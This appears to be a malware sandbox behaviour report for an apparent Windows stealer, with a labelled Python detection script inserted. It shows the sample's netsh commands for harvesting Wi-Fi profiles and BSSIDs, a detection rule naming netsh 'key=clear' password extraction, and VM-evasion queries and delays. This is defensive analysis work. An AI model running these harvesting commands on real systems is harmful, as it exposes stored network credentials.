Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
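The two behaviours in this report that a detection engineer would most want to alert on are the process chain above (cmd.exe /C chcp 65001 && netsh wlan show profile | findstr All, followed by netsh wlan show networks mode=bssid, both spawned by the sample) and the Win32_Processor WMI queries listed earlier, which are a standard VM-fingerprinting read. The following is an added example and is not part of the Joe Sandbox report or of the sample: Python detection logic run over constructed Sysmon-style process-creation events and WQL strings modelled on the report. PID 8020 and the command lines are taken from the report; every other PID, the benign netsh entry, the Win32_VideoController and Win32_Service query texts, and the key=clear rule are assumptions made for the example.

```python
"""Detection logic for two behaviours recorded in the report above: the
cmd.exe -> chcp.com -> netsh.exe WLAN harvesting chain and the WMI hardware
queries used for VM fingerprinting. Added example; the events below are
constructed to mirror the report's process tree, not a real log export."""
import re
from dataclasses import dataclass

SAMPLE_IMAGE = r"C:\Users\user\Desktop\vYz1Z2heor.exe"


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 style record."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed telemetry. PID 8020 is the sample's PID from the report; every
# other PID, and the benign netsh entry at the end, are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent(8020, 1000, SAMPLE_IMAGE, f'"{SAMPLE_IMAGE}"'),
    ProcEvent(8100, 8020, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    ProcEvent(8104, 8100, r"C:\Windows\SysWOW64\chcp.com", "chcp 65001"),
    ProcEvent(8108, 8100, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show profile"),
    ProcEvent(8112, 8100, r"C:\Windows\SysWOW64\findstr.exe", "findstr All"),
    ProcEvent(8200, 8020, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'),
    ProcEvent(8208, 8200, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show networks mode=bssid"),
    ProcEvent(9000, 1000, r"C:\Windows\System32\netsh.exe", "netsh interface ip show config"),
]

# WQL strings: the first three are quoted from the report; the last two are
# constructed (one fingerprinting class named in the report's signature list,
# one benign query that must not fire).
SAMPLE_WMI_QUERIES = [
    "SELECT ExecutablePath, ProcessID FROM Win32_Process",
    "SELECT * FROM Win32_Processor",
    "Select ProcessorId From Win32_processor",
    "SELECT * FROM Win32_VideoController",
    "SELECT Name FROM Win32_Service",
]

# Rules keyed by name. key=clear is the usual follow-up that prints the PSK of
# a named profile; it is included for completeness although this report does
# not show it being used.
WLAN_RULES = {
    "wlan_profiles": re.compile(r"\bnetsh(\.exe)?\s+wlan\s+show\s+profiles?\b", re.I),
    "wlan_bssid_survey": re.compile(r"\bnetsh(\.exe)?\s+wlan\s+show\s+networks?\b.*\bmode=bssid\b", re.I),
    "wlan_key_clear": re.compile(r"\bnetsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey=clear\b", re.I),
}

# Hardware classes commonly read to decide whether the host is a VM or sandbox.
VM_FINGERPRINT_CLASSES = ("Win32_Processor", "Win32_VideoController", "Win32_PnPEntity")
WMI_FINGERPRINT_RX = re.compile(r"\bFROM\s+(" + "|".join(VM_FINGERPRINT_CLASSES) + r")\b", re.I)


def ancestry(events, pid):
    """Images from the given process up to the root of its recorded chain.
    Stops when the parent is absent from the event set or a cycle appears."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def detect_wlan_harvest(events):
    """One (rule, pid, root_image) per event whose command line matches a WLAN
    rule. Both the cmd.exe wrapper and the netsh.exe child match, so each chain
    yields two hits; root_image is the process an analyst should pivot on."""
    hits = []
    for e in events:
        for name, rx in WLAN_RULES.items():
            if rx.search(e.cmdline):
                hits.append((name, e.pid, ancestry(events, e.pid)[-1]))
    return hits


def flag_fingerprint_queries(queries):
    """WQL strings that read a VM-fingerprinting class. Case-insensitive because
    the report shows both Win32_Processor and Win32_processor; Win32_Process does
    not match because the alternation is followed by a word boundary."""
    return [q for q in queries if WMI_FINGERPRINT_RX.search(q)]


if __name__ == "__main__":
    for rule, pid, root in detect_wlan_harvest(SAMPLE_EVENTS):
        print(f"{rule:18} pid={pid} root={root}")
    for q in flag_fingerprint_queries(SAMPLE_WMI_QUERIES):
        print("fingerprint query:", q)
```

Matching on the command line rather than on the image path is deliberate: the report shows the harvesting commands on both the cmd.exe wrapper and the netsh.exe child, so either event alone is enough to fire, and walking the parent chain back to vYz1Z2heor.exe gives the process to contain. The WMI rule is noisier on its own (inventory agents also read Win32_Processor) and is best used to raise the score of a host that already has a WLAN-harvest hit.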
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Section loaded: gpapi.dll
(the following chcp.com and netsh.exe section loads were recorded identically for both cmd.exe -> netsh.exe invocations)
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File written: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
Source: vYz1Z2heor.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vYz1Z2heor.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_05180538 push eax; ret 0_2_05180545
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_0518EC58 push esp; iretd 0_2_0518EC59
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_05181790 push eax; iretd 0_2_0518179D

                              Boot Survival

Source: Yara match | File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match | File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match; File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match; File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: vYz1Z2heor.exe; Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Memory allocated: BC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Memory allocated: 25A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Memory allocated: 24D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599782
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599657
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599532
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599407
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599282
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599172
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598938
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598813
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598688
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598563
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598219
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 598110
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597985
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 596985
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 596860
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 596735
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 596610
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 596480
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594969
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594750
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594641
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594516
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594391
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 594281
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Window / User API: threadDelayed 1489
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Window / User API: threadDelayed 8331
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599782s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599407s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599282s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599172s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598688s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -596480s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99432s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99327s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99219s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -98754s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594750s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594641s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594516s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460; Thread sleep time: -594281s >= -30000s
